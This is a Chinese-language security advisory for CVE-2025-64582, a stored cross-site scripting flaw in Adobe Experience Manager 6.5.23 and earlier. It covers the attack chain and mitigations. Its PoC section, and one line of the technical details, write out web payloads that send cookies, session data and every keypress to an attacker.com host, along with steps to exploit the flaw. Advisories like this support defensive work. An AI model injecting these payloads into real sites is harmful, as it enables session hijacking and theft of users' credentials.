CVE-2025-64582 Adobe Experience Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64582

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64582是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响6.5.23及之前版本，CVSS评分为5.4(中危)。漏洞允许低权限攻击者在表单字段中注入恶意JavaScript脚本。当受害者浏览包含恶意脚本的页面时，浏览器会执行这些脚本，可能导致会话劫持、敏感信息窃取或钓鱼攻击。由于是存储型XSS，恶意脚本会被永久保存在服务器端，影响所有访问该页面的用户。此漏洞需要用户交互才能触发，攻击难度相对较低，但对系统和用户安全仍构成威胁。

技术细节

Adobe Experience Manager(AEM)是一款企业级内容管理解决方案。该漏洞存在于AEM的表单处理组件中，具体是在用户提交表单数据时，后端未对用户输入进行充分的HTML实体编码或输入验证。攻击者作为低权限用户，可在表单的文本字段中嵌入恶意JavaScript代码，如<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>。这些恶意载荷会被存储在AEM的内容仓库中。当其他用户（尤其是管理员）访问包含该恶意内容的页面时，浏览器会将其解析为可执行脚本，从而窃取会话Cookie、伪造用户操作或重定向到恶意网站。攻击成功的前提是受害者访问了被注入恶意脚本的页面。

攻击链分析

STEP 1

1.侦察阶段

攻击者识别目标AEM实例版本，确认版本<=6.5.23，并定位存在漏洞的表单组件

STEP 2

2.初始访问

攻击者以低权限用户身份登录AEM系统，获得基本用户访问权限

STEP 3

3.注入恶意脚本

攻击者在表单文本字段中注入包含恶意JavaScript的payload，如<script>标签或事件处理器属性

STEP 4

4.持久化

恶意脚本被存储在AEM内容仓库(JCR)中，成为页面内容的永久组成部分

STEP 5

5.触发阶段

受害者(管理员或其他用户)访问包含恶意内容的页面，浏览器解析并执行注入的JavaScript代码

STEP 6

6.数据窃取/会话劫持

恶意脚本窃取受害者的Cookie、会话令牌或其他敏感信息，并发送至攻击者控制的服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64582 Stored XSS PoC for Adobe Experience Manager -->
<!-- Inject this payload into a form field that is later displayed to users -->

<!-- Basic XSS payload -->
<script>console.log('XSS Triggered');alert('CVE-2025-64582')</script>

<!-- Cookie stealing payload -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Session hijacking payload -->
<script>
  var img = new Image();
  img.src = 'https://attacker.com/log?data=' + encodeURIComponent(document.cookie + '|' + document.location.href);
</script>

<!-- Keylogger payload -->
<script>
  document.addEventListener('keypress', function(e) {
    fetch('https://attacker.com/keys?k=' + e.key);
  });
</script>

<!-- Steps to exploit:
1. Authenticate as a low-privileged user
2. Navigate to a form page in AEM
3. Fill in a text field with one of the payloads above
4. Submit the form
5. Wait for an admin or other user to view the page containing the malicious content
6. The JavaScript will execute in the victim's browser
-->

影响范围

Adobe Experience Manager 6.5.23及之前所有版本

AEM Cloud Service (需确认具体受影响版本)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)限制低权限用户对表单组件的编辑权限；2)实施输入过滤规则，阻止<script>等危险HTML标签；3)部署WAF规则检测和阻止XSS攻击载荷；4)启用HttpOnly和Secure标志保护Cookie；5)对管理员用户启用双因素认证；6)监控日志中的异常请求模式。